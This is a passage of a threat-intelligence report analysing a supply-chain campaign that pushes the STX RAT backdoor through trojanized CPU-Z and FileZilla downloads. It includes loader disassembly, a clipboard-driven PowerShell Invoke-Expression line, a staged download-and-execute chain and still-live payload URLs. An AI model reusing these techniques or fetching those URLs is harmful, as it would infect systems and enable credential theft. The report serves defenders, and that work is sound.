0011f9: mov  ecx, 0xbda4b2ca        ; ntdll.dll module hash
001205: call resolve_module          ; Walk PEB to find ntdll base

00120a: mov  edx, 0x5a90917e        ; NtFlushInstructionCache hash
001212: call resolve_function        ; -> stored globally

; === Stage 4: Launch backdoor thread ===
00121d: lea  r8, [rip+0x3c]         ; R8 = thread function (at RVA 0x1260)
001229: mov  r9, rsi                ; R9 = lpParameter (shellcode base addr)
001235: xor  ecx, ecx               ; lpThreadAttributes = NULL
001237: call rdi                     ; CreateThread(NULL, 0, thread_func, base, 0, NULL)

; === Stage 5: Wait for thread completion ===
00123e: or   edx, -1                ; dwMilliseconds = INFINITE (0xFFFFFFFF)
001241: mov  rcx, rax               ; hHandle = thread handle
001244: call [WaitForSingleObject]   ; Block until thread exits

; === Cleanup and return ===
001250: <restore registers>
00125f: ret

Summary: The out.dll main function performs:

1. XXTEA decryption (Corrected Block TEA, delta=0x9E3779B9): Decrypts 93KB from .data using a 128-bit key (4 DWORDs at .data[0:16])
2. DEFLATE decompression (raw RFC 1951, custom implementation): Inflates decrypted data to 374KB using lookup tables in .rdata
3. Dynamic API resolution from kernel32.dll and ntdll.dll using ROR14 hashing
4. CreateThread to launch the decompressed C2 beacon (function at RVA 0x1260)
5. WaitForSingleObject(INFINITE) to block until the beacon thread exits

The thread function at 0x1260 does NOT directly handle C2 — it is a small trampoline that:

1. Calls VirtualProtect on the decompressed buffer (0x5BA00 bytes, PAGE_EXECUTE_READWRITE)
2. Calls NtFlushInstructionCache to ensure CPU sees the new code
3. Calculates the entry point: base + offset (offset stored at .data[0:4])
4. Jumps into the decompressed 374KB payload — which IS the actual C2 beacon

The 374KB decompressed payload is a position-independent C2 beacon classified by Kaspersky as Backdoor.Win64.Alien.de (Kaspersky Threat Encyclopedia).

Beacon identification — STX RAT:

• Name: STX RAT (named for STX/0x02 magic byte prefix in C2 messages)
• First documented: February 2026 by eSentire TRU
• AV classifications: Kaspersky: Backdoor.Win64.Alien.de, Ikarus: Trojan-Spy.StxRat, BitDefender: Gen:Variant.Tedy
• C2 protocol: X25519 ECDH key exchange + Ed25519 signature validation + ChaCha20-Poly1305 encryption over TCP
• C2 server: 95.216.51.236 (Hetzner, Finland) — confirmed: our FileZilla version.dll contacts this exact IP
• Capabilities: Hidden VNC (HVNC), credential theft (browsers, FTP, crypto wallets), reverse proxy tunneling, in-memory payload execution, AMSI ghosting
• C2 callback URL in process memory: https://welcome.supp0v3.com/d/callback (VT memory_pattern_urls)

14 independent matches confirm STX RAT identification:

#	Feature	eSentire Report	Our Analysis
1	Distribution	Trojanized FileZilla installers	FileZilla_3.69.5_win64.zip + version.dll
2	Download IP	147.45.178.61	ai.supp0v3.com -> 147.45.178.61
3	Attack chain	VBS -> JScript /elevated -> PowerShell	Identical 3-layer chain in VBS payloads
4	TAR structure	1.bin (RAT) + 2.txt (PS loader)	Same from qwen1.pages.dev
5	Persistence #1	HKCU Run -> autorun.ps1	Same
6	Persistence #2	MSBuild .proj with C# payload	Same (c_3791.proj, CommonBuild.proj)
7	Persistence #3	COM hijack {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}	Exact same GUID -> ActiveX.sct
8	Process check	Must run in powershell or msbuild	All paths use PowerShell or MSBuild
9	PS execution	[Console]::In.ReadToEnd() | Invoke-Expression	Exact same command in sandbox
10	Encryption	XXTEA constant 0x61c88647 + zlib	Same XXTEA + DEFLATE in out.dll
11	API hashing	ROR-14 for kernel32/VirtualProtect/CreateThread	Same hashes resolved
12	Campaign tracking	# Tag: regex from clipboard	# Tag: tbs in VBS + {"tag":"tbs"}in DLL
13	C2 IP	95.216.51.236 (Hetzner)	FileZilla DLL contacts same IP
14	Reflective loader	Exports init, ROR-13 hashing	out.dll exports init, ROR-13 in loader

The beacon performs:

• DNS-over-HTTPS resolution via Cloudflare (1.1.1.1)
• HTTPS POST to welcome.supp0v3.com/d/callback with campaign config
• Receives PowerShell/C# backdoor code from C2
• Pipes code to powershell.exe via stdin for execution

The embedded out.dll is the component that contacts welcome.supp0v3.com/d/callback and pipes the C2-received code to PowerShell, completing the cycle back to persistence.

A.7 STX RAT Unpacking via Unicorn Emulation

The STX RAT binary uses 3 recursive layers of XXTEA+zlib wrapping. Standard XXTEA implementations fail because the malware uses a custom variant. We built a Unicorn CPU emulator-based decryptor (stxrat-decryptor/stxrat_decrypt.py) that emulates the exact XXTEA function from the binary.

Peeling results:

Layer	Input Size	After XXTEA	After zlib	SHA256 (output)
1	351,232 B	343,420 B	346,112 B	6cb3a9ad7618b36e...
2	346,112 B	338,376 B	341,504 B	0cd252acbc97a9d9...
3	341,504 B	333,324 B	588,800 B	3455ec49b8dc3743...

Final core PE (588,800 bytes):

Property	Value
SHA256	3455ec49b8dc3743398a20c271194682eba40a67ee3b10549d3e6f837f7499ca
VT	View
Machine	AMD64
Entry	0x69A14 (real entry, not the XXTEA wrapper’s 0x1000)
.text	430 KB (real code)
.rdata	69 KB (constants, crypto provider strings)
.data	71 KB raw / 95 KB virtual (AES-encrypted string table)
Imports	KERNEL32.dll, Secur32.dll
Exports	init (single export)

Visible strings in the core PE:

• Microsoft Enhanced RSA and AES Cryptographic Provider — for AES-128-CTR string decryption
• Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider — for X25519/Ed25519
• Microsoft Unified Security Protocol Provider — for TLS/SSPI
• InitSecurityInterfaceA — Secur32 SSPI initialization
• Base64 alphabet, datetime format strings, and 2,906 total strings (most still AES-encrypted)

The C2 domains, IP addresses, feature strings, and campaign config remain encrypted in the .data section using rolling XOR + AES-128-CTR (per-entry keys). Decrypting this layer requires emulating the Windows CryptoAPI (CryptDecrypt), which is beyond pure CPU emulation.

Decryptor tool: stxrat-decryptor/stxrat_decrypt.py (requires uv with unicorn, capstone, pefile)

All decrypted payloads saved locally:

• samples/dropped/BuildCache_dec_decrypted.bin (Dec 2025)
• samples/dropped/BuildCache_march_decrypted.bin (Mar 2026)
• samples/dropped/BuildCache_april_decrypted.bin (Apr 2026)
• samples/dropped/BuildCache_*_outdll.bin (extracted embedded PEs)

---

Appendix B: Live Infrastructure & Earlier Campaign Analysis

Probed 2026-04-10. All findings below are from still-live attacker infrastructure.

B.1 Infrastructure Status (as of 2026-04-10)

Asset	Status	Detail
supp0v3.com (all subdomains)	DOWN	NXDOMAIN — DNS nameservers removed entirely
147.45.178.61 (backend)	ALIVE	Apache httpd, HTTP 200, serving “Hello, world” page
/file/ on backend	ALIVE	HTTP 403 (dir listing off, but files accessible by name)
/file/t10/LibreOffice...vbs	ALIVE	HTTP 200, 13,810 bytes — serving VBS exploit payload
/file/GoogleDriveSetup.vbs	ALIVE	HTTP 200, 13,747 bytes — serving VBS exploit payload
qwen1.pages.dev/continue	ALIVE	HTTP 200 — serving 481KB TAR with shellcode + PS loader
R2 pub-45c25.../cpu-z_2.19-en.zip	ALIVE	HTTP 200, 6,050,530 bytes — hash-verified match to our sample
R2 pub-45c25.../ (other files)	BLOCKED	HTTP 403 (hwmonitor, perfmonitor, powermax all blocked)
R2 pub-fd67c...	DOWN	HTTP 404
R2 pub-f3252...	DOWN	HTTP 404

B.2 VBS Exploit Payloads (from 147.45.178.61)

Downloaded from the still-live backend server at paths used by the CVE-2023-36025 .url shortcut exploits.

B.2.1 LibreOffice_25.8.4_Win_x86-64.vbs

Property	Value
Path	http://147.45.178.61/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs
Size	13,810 bytes
SHA256	8071577153e29cc19c93302858bd88a149077c2b89fb439c61e8c278a05e3187
Build date	2025-10-31
Author	@d_coroner
Generator	generate_vbs.py from release.vbs template (Jinja2: main.js.j2)
Campaign tag	# Tag: tbs
C2 callback	# Callback: https://welcome.supp0v3.com/d/callback
Staging URL	https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...
Decoy action	Opens real LibreOffice installer from download.documentfoundation.org

Full execution flow (3-layer matryoshka):

LAYER 1: VBS (delivered via .url CVE-2023-36025 over WebDAV)
├── Builds a JavaScript string containing layers 2+3
├── Writes it to %TEMP%\LibreOffice_25.8.4_Win_x86-64.msi.js
└── ShellExecute wscript.exe "tempfile.js" /elevated, "runas"  ← UAC ELEVATION
         │
         ▼
LAYER 2: JavaScript (runs elevated as wscript.exe)
├── Opens REAL LibreOffice installer as decoy:
│     WScript.Shell.Run("https://download.documentfoundation.org/.../LibreOffice_25.8.4_Win_x86-64.msi")
├── Writes PowerShell code to %TEMP%\~clip.txt
├── Pipes to clipboard: cmd /c type ~clip.txt | clip
├── Deletes ~clip.txt
└── ExecuteCommand(embeddedText, 256)
      → First 256 chars = powershell -c "Invoke-Expression(
           ([System.Text.StringBuilder]::new((Get-Clipboard -Raw))).Remove(0, 256).ToString());"
      → This reads the clipboard, strips the first 256 chars (the PS command itself), executes the rest
         │
         ▼
LAYER 3: PowerShell (from clipboard, with progress bar social engineering)
├── Displays ASCII art banner "LiteLLM" and "Deployment in progress..."
├── Compiles C# TarExtractor class inline (Add-Type) for in-memory TAR parsing
├── Downloads TAR from: https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...
├── Extracts TAR in memory:
│     ├── 1.bin (*.bin) → reversed base64 string → stored in $configurationString
│     └── 2.txt (*.txt) → PowerShell shellcode loader → executed via IEX
├── 2.txt loads $configurationString, reverses it, base64-decodes → Alien PE (351KB)
├── VirtualAlloc (RWX) + WriteProcessMemory + delegate invoke at offset 4592
└── Alien backdoor executes → C2: welcome.supp0v3.com/d/callback

Key observations:

• The ASCII banner shows “LiteLLM” — the malware disguises itself as a legitimate LiteLLM AI proxy deployment
• Progress messages (50% done, 75% done, 100% done) provide social engineering cover
• The Remove(0, 256) trick is clever: the PowerShell command itself is exactly 256 chars (padded with spaces), then it strips itself from the clipboard content and executes the remaining code
• The .js extension (LibreOffice_25.8.4_Win_x86-64.msi.js) mimics the real MSI filename but with .js appended
• UAC elevation is requested via runas, meaning the backdoor runs as admin

B.2.2 GoogleDriveSetup.vbs

Property	Value
Path	http://147.45.178.61/file/GoogleDriveSetup.vbs
Size	13,747 bytes
SHA256	cc8d281ee96d60669dfe2353bc8bcb4da5c15ae18aeecce606bcc7e48ac49ce2
Build date	2025-10-31
Author	@d_coroner
Campaign tag	# Tag: click (different from LibreOffice’s tbs)
C2 callback	# Callback: https://helloworld.supp0v3.com/d/callback (test subdomain)
Staging URL	https://qwen1.pages.dev/continue?uid=686284849961&token=9oIvxTfx...
Decoy action	Opens real Google Drive installer from dl.google.com

Same 3-layer technique as LibreOffice variant with these differences:

Difference	LibreOffice	GoogleDrive
Temp JS filename	LibreOffice_25.8.4_Win_x86-64.msi.js	GoogleDriveSetup.exe.js
Campaign tag	# Tag: tbs	# Tag: click
C2 subdomain	welcome.supp0v3.com (production)	helloworld.supp0v3.com(test/dev)
Staging UID	uid=371803630623	uid=686284849961
Decoy URL	download.documentfoundation.org/.../LibreOffice_25.8.4_Win_x86-64.msi	dl.google.com/drive-file-stream/GoogleDriveSetup.exe
Hostname comment	# Hostname: libreoffice	# Hostname: googledrive

The use of helloworld.supp0v3.com (first seen 2025-11-17) vs welcome.supp0v3.com (first seen 2025-12-11) suggests the GoogleDrive variant was an earlier iteration using the test C2 subdomain.

B.3 qwen1.pages.dev Staging Payload

The staging server hosts the second-stage payload for the .url exploit chain. Both VBS payloads (LibreOffice/GoogleDrive, despite different UIDs and tokens) receive identical content.

Property	Value
URL	https://qwen1.pages.dev/continue?uid=<victim_id>&token=<tracking>
Status	ALIVE (HTTP 200 as of 2026-04-10)
Type	POSIX TAR archive (GNU)
Size	481,280 bytes
SHA256	fd0c4e1b877f8e787b5cd479a408f37238d17a879e2885839b3e108a8d5d6c55

TAR contents:

File	Size	Description
1.bin	468,312 B	Reversed base64-encoded Alien PE (the actual backdoor)
2.txt	9,520 B	PowerShell shellcode loader (VirtualAlloc + WriteProcessMemory + delegate invoke)

B.3.1 1.bin — Reversed Base64 Alien Backdoor PE

Property	Value
Encoding	Base64, character-reversed (==AAAA... -> reverse -> TVqQ... -> decode)
Decoded size	351,232 bytes
Decoded SHA256	b7d64d6a9c641855f400949c8c000e1b53b9355fbe3663e41f01e4b80f8eab60
Type	PE32+ executable (AMD64) — MZ header confirmed
Entry offset	4592 (0x11F0) — compare with BuildCache out.dll reflective loader at 0x11F4 (4 bytes apart)
Identification	Backdoor.Win64.Alien — same PE structure, same string patterns as BuildCache out.dll

This is the same backdoor family as the CPUID campaign payload, delivered through a different vector (VBS + clipboard hijack instead of DLL sideloading).

B.3.2 2.txt — PowerShell Shellcode Loader

A 9,520-byte PowerShell script that:

1. Get-SystemDelegate — creates dynamic .NET delegate types at runtime (same technique as New-DelegateType in the CPUID PowerShell stage)
2. Add-Type with P/Invoke — compiles C# with VirtualAlloc, WriteProcessMemory, GetCurrentProcess from kernel32.dll
3. ConvertFrom-ReversedString — reverses the base64 string from 1.bin
4. Initialize-PayloadExecution — base64-decodes the reversed string, builds a parameter overlay structure
5. Invoke-ProcessMemoryOperation — VirtualAlloc (RWX) + WriteProcessMemory + Marshal.GetDelegateForFunctionPointer at entry offset 4592 + invoke

The variable naming uses business/enterprise themes (ConfigurationMode, RuntimeConfig, PayloadProcessor) — the same obfuscation style as the CPUID PowerShell stage ($marketManager, $customerAgent).

B.4 Evidence Linkage Summary

                    .url EXPLOIT CAMPAIGN                    CPUID SUPPLY CHAIN
                    (Oct-Dec 2025)                           (Dec 2025 - Apr 2026)
                    ─────────────────                        ─────────────────────

  Delivery:         .url shortcut files                      Trojanized ZIPs / Inno Setup
                    CVE-2023-36025                           DLL sideloading (CRYPTBASE.dll)
                         │                                        │
  Hosting:          147.45.178.61                            Cloudflare R2 buckets
                    (WebDAV /file/)                          (redirected from cpuid.com)
                         │                                        │
  Stage 1:          VBS -> clipboard PS                      CRYPTBASE.dll -> reflective load
                         │                                        │
  Stage 2:          qwen1.pages.dev TAR                      out.dll XXTEA+DEFLATE decrypt
                    (reversed base64 PE)                     (colon-hex encoded shellcode)
                         │                                        │
  Payload:          Alien PE (351 KB)          ═══════        Alien PE (355-380 KB)
                    entry @ 0x11F0                           entry @ 0x11F4
                         │                                        │
  C2:               helloworld.supp0v3.com ──── SAME ──── welcome.supp0v3.com
                    /d/callback               DOMAIN          /d/callback
                         │                                        │
  Backend:          ai.supp0v3.com ──────────── SAME ──────── ai.supp0v3.com
                    -> 147.45.178.61             IP           -> 147.45.178.61
                         │                                        │
  Tag:              "tbs" / "click"  ─────────── SAME ──────── "tbs" / "cpz"
                                                TAG

Strong links (verified):

1. Same C2 domain (supp0v3.com) with same callback path (/d/callback)
2. Same campaign tag (tbs) in both VBS headers and DLL C2 config JSON
3. Same backend IP (147.45.178.61) via DNS (ai.supp0v3.com) and direct .url reference
4. Same backdoor PE family (Alien) with near-identical entry point offsets (0x11F0 vs 0x11F4)
5. Same PowerShell obfuscation style (business-themed variable names, dynamic delegate creation)

The @d_coroner handle:

• Appears as // Author: @d_coroner in VBS payload headers on the backend server
• Also found in the MEXC CRYPTBASE.dll via VT content search (same file that contains supp0v3.com)
• Not publicly documented in any threat intelligence — no matches on GitHub, Twitter, Telegram, or forums
• Should be treated as an unverified handle from payload metadata (could be the developer, an alias, or misdirection)

B.5 Additional IOCs from Live Infrastructure

File Hashes (newly collected)

SHA256	File	Source
8071577153e29cc19c93302858bd88a149077c2b89fb439c61e8c278a05e3187	LibreOffice_25.8.4_Win_x86-64.vbs	Live: http://147.45.178.61/file/t10/
cc8d281ee96d60669dfe2353bc8bcb4da5c15ae18aeecce606bcc7e48ac49ce2	GoogleDriveSetup.vbs	Live: http://147.45.178.61/file/
fd0c4e1b877f8e787b5cd479a408f37238d17a879e2885839b3e108a8d5d6c55	qwen1 staging TAR (both UIDs)	Live: https://qwen1.pages.dev/continue
b7d64d6a9c641855f400949c8c000e1b53b9355fbe3663e41f01e4b80f8eab60	Decoded Alien PE (from TAR 1.bin)	Extracted from staging TAR
8f7116cfefa56af3...	2.txt PowerShell loader	Extracted from staging TAR

Network IOCs (newly discovered)

Indicator	Type	Context
qwen1.pages.dev	Staging domain	Cloudflare Pages, delivers TAR with shellcode
https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...	Staging URL	LibreOffice campaign
https://qwen1.pages.dev/continue?uid=686284849961&token=9oIvxTfx...	Staging URL	GoogleDrive campaign
http://147.45.178.61/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs	WebDAV payload	Still live
http://147.45.178.61/file/GoogleDriveSetup.vbs	WebDAV payload	Still live

---

Local Sample Repository

cpu-z-april-supply-chain/
  ANALYSIS.md                                        <- This document
  cpu-z_2.19-en.zip                                  <- Primary trojanized package (VT-downloaded)
  samples/
    CRYPTBASE_bundled.dll                            <- Malicious DLL from ZIP (2.08 MB)
    CRYPTBASE_variant.dll                            <- Related DLL variant (1.20 MB)
    cpuz_x32.exe                                     <- Legitimate CPU-Z 32-bit (signed by CPUID+Microsoft)
    cpuz_x64.exe                                     <- Legitimate CPU-Z 64-bit (signed by CPUID+Microsoft)
    decoded_payload.bin                              <- Decoded shellcode+PE from .rdata (349 KB)
    dropped/                                         <- C2-delivered persistence components (from VT)
      CommonBuild.proj                               <- MSBuild C# shellcode loader (3.9 KB)
      ActiveX.sct                                    <- COM hijacking scriptlet (977 B)
      Clippy.sct                                     <- IPv6-encoded .NET runner (11.8 KB)
      Moniker.dll                                    <- Extracted .NET assembly from Clippy.sct (4.1 KB)
      BuildCache_april.dat                           <- Final shellcode, XOR-encrypted (760 KB, Apr 2026)
      BuildCache_march.dat                           <- Final shellcode, XOR-encrypted (732 KB, Mar 2026)
      BuildCache_dec.dat                             <- Final shellcode, XOR-encrypted (710 KB, Dec 2025)
      BuildCache_*_decrypted.bin                     <- XOR-decrypted versions
      BuildCache_*_outdll.bin                        <- Extracted out.dll PEs from decrypted payloads
    backend/                                         <- Files from LIVE backend infrastructure
      LibreOffice_25.8.4_Win_x86-64.vbs             <- VBS exploit payload (live from 147.45.178.61)
      GoogleDriveSetup.vbs                           <- VBS exploit payload (live from 147.45.178.61)
      qwen1_staging_libreoffice.ps1                  <- TAR from qwen1.pages.dev (481 KB)
      qwen1_staging_googledrive.ps1                  <- TAR from qwen1.pages.dev (identical)
      tar_1.bin                                      <- Reversed base64 Alien PE (468 KB)
      tar_2.txt                                      <- PowerShell shellcode loader (9.5 KB)
      decoded_shellcode_from_staging.bin             <- Decoded Alien PE from 1.bin (351 KB)
      r2_live_cpu-z_2.19-en.zip                      <- Trojanized ZIP still served from R2 (hash-verified)
  extracted/
    cpu-z_2.19-en (1)/                               <- Extracted ZIP contents

Report generated: 2026-04-10 | Classification: TLP:CLEAR